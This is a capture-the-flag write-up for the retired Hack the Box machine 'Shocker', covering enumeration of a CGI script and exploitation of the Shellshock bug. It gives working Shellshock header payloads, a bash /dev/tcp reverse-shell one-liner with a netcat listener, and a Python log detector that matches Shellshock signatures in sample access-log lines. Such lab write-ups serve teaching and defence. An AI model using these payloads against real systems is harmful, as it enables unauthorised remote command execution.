Hack the Box – Shocker – Part 1 User Flag
# Information:
Platform Name: Hack the Box
Machine Challenge: Shocker
Machine Status: Retired
Machine Matrix:
- Enum: 5.5
- CTF: 5.1
- Custom: 3.7
- CVE: 6.3
- Real: 4.9
Challenge Level: Easy
Part 1: User Flag
# Used Tools:
- VirtualBox
- nmap
- Linux (Kali or other Distro)
- nmap http-shellshock NSE script
- gobuster
- Burp
- netcat
# Challenge Description:
This challenge has no description, instead we are presented with this:
# Writeup:
Step 1
Well before anything you should probably install VirtualBox and create a virtual machine with any Linux distro. The recommended one is usually Kali Linux because it comes with all the tools already.
However, you can use any other distro you like, in my case I created a virtual machine and installed Kubuntu without any extra tools and I am now installing the tools as I need them. (Note: if you want me to create a tutorial on how to install VirtualBox and on how to create a new virtual machine on a Linux computer let me know in the comments please)
Step 2
Once you have VirtualBox and a Linux virtual machine created, log in to the VM, open a terminal, and connect to the HTB VPN. To do so, first install openvpn on your Linux VM by typing:
mregra on Cyber:VM $ sudo apt update && sudo apt install openvpn -y
After openvpn is installed go to your HTB home page and on the top right corner, you should find a button “Connect to HTB”, click on it. A menu should appear from the right with the options “Machines” and “Starting Point”. For our purpose, we need the option Machines, and after clicking on it we want the option OpenVPN.
Finally, you can pick the server you prefer. I would suggest you pick the one closest to you, which should be the first one presented. You can also choose either a UDP or a TCP connection. TCP should be more reliable, but UDP should be faster. For our purpose it does not matter much which one you choose, just pick one. I will go with UDP, and then simply click “Download VPN”.
Step 3
Now that you have openvpn installed and that you downloaded the VPN from HTB you simply have to connect to it. To do so, run the command:
mregra on Cyber:VM $ sudo openvpn <your_vpn_name>.ovpn
Note that you should first go to the folder where the ovpn file was downloaded to.
If, after running the previous command you get “Initialization Sequence Completed” or something similar, you should be good to go.
Step 4
Now, let’s go back to the HTB site, in particular: Shocker.
In this challenge, as previously said, there is no description, so all we have to do is simply Join the Machine.
We get an IP address: 10.10.10.56
We have a hint in the name of the challenge: “Shocker” could mean this box is vulnerable to Shellshock?!? Let’s see!
Step 5
First, I created a folder for organization purposes. I will use this folder to store all information that I may gather during the recon & enumeration & information-gathering phase of the process.
With this out of the way, I jumped right into it! I decided to use nmap to search and probe open ports, I used the command:
mregra on Cyber:VM/HTB/Shocker $ nmap -sC -sV -o nmap/first_scan 10.10.10.56
The flags I used are for:
- -sC – Runs the default set of NSE scripts against the discovered services.
- -sV – Probes open ports to determine service/version info (from the manual).
- -o – Writes the nmap output to the file first_scan inside the nmap folder (the documented form of this flag is -oN for normal output). Another option is -oA, which writes the results in the 3 major formats at once.
The nmap output is:
As you can see we have 2 ports open:
- port 80, and
- port 2222.
By looking at the nmap output we can see that the service on port 2222 leaks its version: OpenSSH 7.2p2 Ubuntu 4ubuntu2.2. The Ubuntu package suffix is very specific and points to a particular distro release, in this case xenial, as we will confirm next.
By performing a quick Google search I was able to confirm that this is in fact a xenial package, and also that this update is from March 2017. (The link with the information can be found at the end of the post.)
We could also have used the Apache version to find out the Ubuntu version of this box.
Step 6
Now that we did some enumeration and information gathering, which helped us to discover the open ports and the Ubuntu version, let’s begin with a gobuster against port 80, which seems the most promising port for now.
We use gobuster to brute force URIs (directories and files) in websites.
The command we use first is the following:
mregra on Cyber:VM/HTB/Shocker $ gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/small.txt
What this command does is: first, the dir keyword puts gobuster in directory/file enumeration mode. Second, the -u flag indicates the target URL, in this case http://10.10.10.56, which is the IP of the machine. Finally, the -w flag selects the word list, in this case the small.txt word list shipped with dirb on Kali Linux.
After running the command, this is the output:
As you can see, gobuster found a directory, /cgi-bin/, with status code 403, which means the server refuses to list or serve that directory itself.
On the browser, when we try to access this directory we get 403 Forbidden, as such:
Step 7
Now that we have this information we can use gobuster again, this time to enumerate the contents of the directory /cgi-bin/.
However, this time, if we simply use:
mregra on Cyber:VM/HTB/Shocker $ gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt
We get nothing.
I decided, after some research, to use the gobuster flag -x which searches the directory for the file extensions indicated, in our case, I decided to try, sh, pl, py, txt.
Here is the full command:
mregra on Cyber:VM/HTB/Shocker $ gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x sh,pl,txt,py
And the output was:
As you can see we have a file!! user.sh
After getting this information I went back to the browser and tried the URL http://10.10.10.56/cgi-bin/user.sh. Sometimes we do not have access to the directories but we can have access to the files inside the directories. And the result was…
A file was downloaded. The contents of the file:
Content-Type: text/plain
Just an uptime test script
03:28:42 up 1:01, 0 users, load average: 0.00, 0.02, 0.00
So this is a simple CGI script that the web server executed, and what we downloaded is its output rather than its source.
Step 8
Now we will try Shellshock. We do so because the name of the HTB machine is Shocker, and also because there is a CGI script (user.sh) that the web server runs through bash, which is exactly the path Shellshock abuses when the bash version is unpatched.
Note: Shellshock is a bug in Bash versions 1.0.3 through 4.3 in the way bash imports function definitions from environment variables: text placed after the function body is executed as a command. Since a CGI handler copies request headers into the environment of the script it launches, an attacker can execute bash commands on the target machine remotely.
There are several ways to exploit Shellshock. We will use nmap Shellshock script and Burp to crack this.
First, let’s search in google for the correct nmap shellshock script command which is:
mregra on Cyber:VM/HTB/Shocker $ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
As you can see in the image above, this web application seems to in fact be vulnerable to Shellshock.
Step 9
Now that we have some kind of confirmation that this machine is vulnerable to Shellshock, we need a way to intercept the nmap communication on Burp to analyze it and perform the attack.
To do so, all we have to do is create a new proxy listener in Burp and redirect the traffic that nmap generates through it to 10.10.10.56 port 80. Here is how:
First: Go to Burp -> Proxy -> Options -> Proxy Listeners -> Add
Second: Now, on the “Add a new proxy listener” menu, under Bind to port you can put a random port number, like 8081, or 5555, whatever. I went for 5555:
Third: Before pressing OK, go to the tab “Request handling”. And under “Redirect to host” write the host IP, in our case: 10.10.10.56, and under “Redirect to port” write the port 80, and finally press “OK”:
One way to test if everything is set up correctly is to simply go to http://127.0.0.1:5555/cgi-bin/ with Intercept off on Burp and you should get 403 Forbidden.
Now that everything is correct, go back to Burp, set Intercept on, go back to the terminal, and run the command:
mregra on Cyber:VM/HTB/Shocker $ nmap -sV -p5555 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 127.0.0.1
Note that this script has the specified port 5555 and the host is 127.0.0.1, so now we should be able to intercept the communication on Burp.
It works! Now we can click Forward and look for shellshock requests. Below you can find the request that popped up on my Burp:
After finding the request, I went back to HTTP history to find it again and read it more carefully as well as to analyze the server response:
After finding it, I sent it to Repeater by right-clicking on the request and choosing the option Send to Repeater.
Once in the Repeater tab of Burp I resent the request:
The shellshock seemed to have worked but by looking at the output in the terminal we get 500 Internal Server Error:
This means that the ls command was not properly executed.
On Burp we have:
So indeed, the ls command did not work. Let’s see if we can fix it!
Step 10
By comparing the request that verifies that the web server is vulnerable to Shellshock with the request that sends the ls command, we can see a difference:
In the request that confirms the Shellshock vulnerability, an echo; is sent before the actual command. Let’s go back to the Repeater in Burp and edit the ls request by adding the echo;
Note that I also used the full path /bin/ls instead of ls. Without it I was not getting anything: the command runs in the minimal environment the CGI handler gives the script, so you cannot rely on PATH being set the way it is in an interactive shell, and the full path avoids the problem.
The echo; was necessary to produce the blank line between the header and the body of the response. In HTTP there must always be a blank line separating the headers from the body, and when the command output is emitted before the script has printed a valid header block, Apache cannot build a proper response and answers with 500 Internal Server Error.
As you can see, we now have the output from the ls command.
Another way that works, instead of the /bin/ls is by calling the bash with a specific command, an example is:
Referer: () { :;}; echo; /bin/bash -c ls
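From the defender's side, the same signature that the requests above rely on is what you look for in the web server logs. The following is an added example, not code from the post: it parses Apache combined-format access log lines (constructed sample lines, not taken from the box), flags entries whose Referer or User-Agent carries the Shellshock function-definition pattern, and keeps the status code so you can tell a probe that hit the 500 "malformed header" symptom from one that got a well-formed 200 back.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" access log format. Referer and User-Agent are logged, and
# those are the request headers most commonly abused to carry a Shellshock
# payload, so the access log alone already shows the probes seen in this post.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock signature: an exported bash function definition "() { ... }"
# followed by ";" and trailing text, which an unpatched bash executes.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

# Constructed sample lines for this example (not taken from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [26/Jan/2021:03:28:42 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 108 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Jan/2021:03:29:10 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 614 "() { :;}; /bin/ls" "Mozilla/5.0 (compatible; Nmap Scripting Engine)"
10.10.14.5 - - [26/Jan/2021:03:30:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 326 "() { :;}; echo; /bin/bash -c ls" "Mozilla/5.0"
10.10.14.9 - - [26/Jan/2021:03:31:44 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"
"""


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if malformed."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def shellshock_hits(log_text: str) -> List[Dict[str, object]]:
    """One finding per line whose Referer or User-Agent carries the signature.
    The status is kept: a 500 on a CGI script is Apache's "malformed header"
    symptom (payload ran, no blank line before the body); a 200 means the
    payload produced a well-formed response, i.e. command output came back."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        parts = rec["req"].split()
        path = parts[1] if len(parts) >= 2 else rec["req"]
        for field in ("referer", "ua"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"ip": rec["ip"], "path": path, "field": field,
                             "status": int(rec["status"])})
                break
    return hits
```

The access log only records Referer and User-Agent, so a payload carried in another header (Cookie or a custom header) will not show up here; for those you need full request logging or a WAF rule matching the same pattern.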
We now need a way to run commands with the nmap script used previously.
Step 11
To do so I searched in nmap for the script in my VM by typing:
mregra on Cyber:VM/HTB/Shocker $ locate nse | grep shellshock
After finding the file, I opened it with nano and read through it. There was a line that assigned the given command input to a variable; this was the place to add the string echo; /bin/bash -c that allows the command to execute and return its output.
After some tweaking and debugging I got to this:
And now it works, after running the previous command, the ls, this was the output:
Now we can get a reverse shell in the box and access to it remotely!!
Step 12
To get a reverse shell I searched online for it and I found this amazing site.
They have a cheat sheet of reverse shell scripts in different programming languages!!
I decided to give a try to the Bash version:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Before running the command anywhere we need a TCP listener on our machine to receive the reverse shell.
To do that we can use Netcat, which, as you probably know simply “is a computer networking utility for reading from and writing to network connections using TCP or UDP”. Wikipedia.
The command I used was the following:
mregra on Cyber:VM/HTB/Shocker $ nc -lvp 6666
According to the netcat manual:
- -l Listen mode, for inbound connects
- -v Verbose
- -p port Specify local port for remote connects
With the listener ready, I went back to Burp to use the Pentestmonkey shell one-liner, as such:
After clicking “Send” I got no response in Burp, but looking at the open Netcat listener I had this:
I have a reverse shell!!!
Now let’s try to get the User flag. Well after some search on the machine I found the flag at: /home/shelly/user.txt
And the user flag is:
References:
Image source: here
Information source links:
OpenSSH version information link.
Thank you very much for reading!
Cheers,
MRegra